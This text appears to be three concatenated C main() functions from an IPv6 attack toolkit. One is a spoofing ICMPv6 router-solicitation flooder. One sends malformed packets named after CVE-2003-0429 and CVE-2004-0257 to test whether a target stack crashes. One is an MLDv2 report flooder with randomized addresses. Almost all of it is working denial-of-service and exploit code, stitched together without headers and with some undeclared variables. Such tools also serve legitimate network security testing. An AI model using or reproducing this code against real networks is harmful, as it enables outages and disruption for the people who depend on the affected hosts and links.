int main(int argc, char *argv[]) { char *interface; unsigned char mac[6] = "", *mac6 = mac; unsigned char buf[1460]; unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL; int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK; unsigned char *pkt2 = NULL; int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0; int until = 0, rand_src = 0, rand_mac = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "sSDFH")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 's': rand_src = 1; break; case 'S': rand_mac = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (argc - optind > 1) { if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]); exit(-1); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) prefer = PREFER_GLOBAL; } dstmac = thc_get_mac(interface, src, dst); src = thc_get_own_ipv6(interface, dst, prefer); mac6 = thc_get_own_mac(interface); if (mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); buf[0] = 1; buf[1] = 1; memcpy(buf + 2, mac6, 6); i = 8; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0) return -1; thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2); hdr = (thc_ipv6_hdr *) pkt2; k = rand(); if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood with ICMPv6 router solicitation on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { if (rand_mac) { memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4); memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4); } if (rand_src) { memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3); } if (rand_mac || rand_src) { hdr->pkt[offset + 42] = 0; hdr->pkt[offset + 43] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40); hdr->pkt[offset + 42] = mychecksum / 256; hdr->pkt[offset + 43] = mychecksum % 256; k++; } count++; if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) { printf("!"); } // usleep(1); if (count % 1000 == 0) printf("."); if (until > 1) until--; } return 0; }
int main(int argc, char *argv[]) { int test = 0, count = 1, tmplen; unsigned char buf[1500], bla[1500], tests[256], string[64] = "ip6 and dst ", string2[64] = "ip6 and src "; unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal; unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6]; thc_ipv6_hdr *hdr; int i = 0, j, srcmtu, fragsize, offset = 14; pcap_t *p; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500; char *interface; thc_ipv6_hdr *ipv6; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } if (strcmp(argv[1], "-p") == 0) { noping = 1; argv++; argc--; } if (do_hdr_size) offset = do_hdr_size; interface = argv[1]; dst6 = thc_resolve6(argv[2]); route6 = thc_resolve6("2a01::"); memcpy(ldst6, dst6, 16); memset(ldst6 + 2, 0, 6); ldst6[0] = 0xfe; ldst6[1] = 0x80; mcast6 = thc_resolve6("ff02::1"); if (argc >= 4) test = atoi(argv[3]); memset(buf, 0, sizeof(buf)); memset(null_buffer, 0, sizeof(null_buffer)); src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); strcat(string2, thc_ipv62notation(dst6)); srcmac = thc_get_own_mac(interface); if (rawmode == 0) { if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } } else dstmac = null_buffer; if ((srcmtu = thc_get_mtu(interface)) <= 0) { fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface); exit(-1); } if (do_hdr_size) srcmtu -= (do_hdr_size - 14); fragsize = ((srcmtu - 62) / 8) * 8; if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } setvbuf(stdout, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); printf("Performing vulnerability checks on %s via %s:\n", argv[2], argv[1]); if (noping == 0 && check_alive(p, interface, src6, dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[2]); exit(-1); } else printf("Test 0: normal ping6\t\t\t\tPASSED - we got a reply\n"); /********************** TEST CASES ************************/ if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE overlarge ping, 6 checksum combinations\n", count); tmplen = 65864; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 3] = 0xe5; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x98; hdr->pkt[offset + 40 + 3] = 0xa4; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0xa3; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 2] = 0x84; hdr->pkt[offset + 40 + 3] = 0x90; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; hdr->pkt[offset + 40 + 3] = 0x8f; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { // 1432 printf("Test %2d: CVE-NONE large ping, 3 checksum combinations\n", count); tmplen = 65527; if ((mal = malloc(tmplen)) == NULL) return -1; memset(mal, count % 256, tmplen); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, count, mal, tmplen, 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize) < 0) return -1; // because of the different possible checksum calculations we have to do them all hdr->pkt[offset + 40 + 2] = 0x31; hdr->pkt[offset + 40 + 3] = 0x8c; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); hdr->pkt[offset + 40 + 3] = 0x8a; thc_send_as_fragment6(interface, src6, dst6, NXT_ICMP6, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, fragsize); free(mal); pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-2003-0429 bad prefix length (little information, implementation unsure\n", count); memset(bla, count % 256, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = 128; // prefix length // BUG IS HERE buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i += 28; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-2004-0257 ping, send toobig on reply, then SYN pkt\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 64, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, 68, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; ipv6 = (thc_ipv6_hdr *) pkt; thc_inverse_packet(ipv6->pkt + offset, ipv6->pkt_len - offset); sleep(1); thc_toobig6(interface, src6, srcmac, dstmac, 68, ipv6->pkt + offset, ipv6->pkt_len - offset); i = 0; while (ports[i] != 0) { if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt, &pkt_len, 1100 + i * 100, ports[i], i * 1000, 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); pkt_len = 0; i++; } } count++; /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count % 256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ /* if (test == 0 || test == count) { printf("Test %2d: CVE-20\n", count); memset(bla, count%256, sizeof(bla)); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL) return -1; buf[0] = 0; thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, count, (unsigned char *) &buf, i, 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; pkt = thc_destroy_packet(pkt); } count++; */ // more? /******************* END OF TESTCASES ***************************/ if (noping == 1 || check_alive(p, interface, src6, dst6)) printf("Test %2d: normal ping6 (still alive?)\t\tPASSED - we got a reply\n", count); else printf("Test %2d: normal ping6 (still alive?)\t\tFAILED - target is unavailable now!\n", count); thc_pcap_close(p); return 0; }
int main(int argc, char *argv[]) { char *interface, mac[6] = ""; unsigned char *mac6 = mac, *ip6 = thc_resolve6("fe80::ff:fe00:0"); unsigned char buf[6], buf2[RECORD_NUMBER * (4 + 16 + 16)]; unsigned char *dst = thc_resolve6("ff02::16"), *dstmac = thc_get_multicast_mac(dst); int i, j, prefer = PREFER_LINK; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; int count = 0; if (argc < 2 || argc > 4 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[1]; if (thc_get_own_mac(interface) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (argc > 2) { if ((dst = thc_resolve6(argv[2])) == NULL) { fprintf(stderr, "Error: can not resolve %s\n", argv[2]); exit(-1); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) { prefer = PREFER_GLOBAL; ip6 = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL); } } mac[0] = 0x00; mac[1] = 0x18; ip6[9] = mac[1]; memset(buf, 0, sizeof(buf)); buf[0] = 5; buf[1] = 2; memset(buf2, 0, sizeof(buf2)); for (i = 0; i < RECORD_NUMBER; i++) { buf2[0 + i * 36] = 3; // CHANGE_TO_INCLUDE_MODE buf2[3 + i * 36] = 1; buf2[4 + i * 36] = 0xff; buf2[5 + i * 36] = 0x02; memcpy(buf2 + 20 + i * 36, ip6, 16); } printf("Starting to flood network with MLDv2 reports on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 0; i < 4; i++) mac[2 + i] = rand() % 256; // ip6[9] = mac[1]; ip6[10] = mac[2]; ip6[13] = mac[3]; ip6[14] = mac[4]; ip6[15] = mac[5]; for (i = 0; i < RECORD_NUMBER; i++) { for (j = 0; j < 6; j++) buf2[14 + j + i * 36] = rand() % 256; memcpy(buf2 + 29 + i * 36, ip6 + 9, 7); } count++; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 1, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_MLD2_REPORT, 0, RECORD_NUMBER, buf2, sizeof(buf2), 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) { // fprintf(stderr, "Error sending packet no. %d on interface %s: ", count, interface); // perror(""); // return -1; printf("!"); } pkt = thc_destroy_packet(pkt); // usleep(1); if (count % 1000 == 0) printf("."); } return 0; }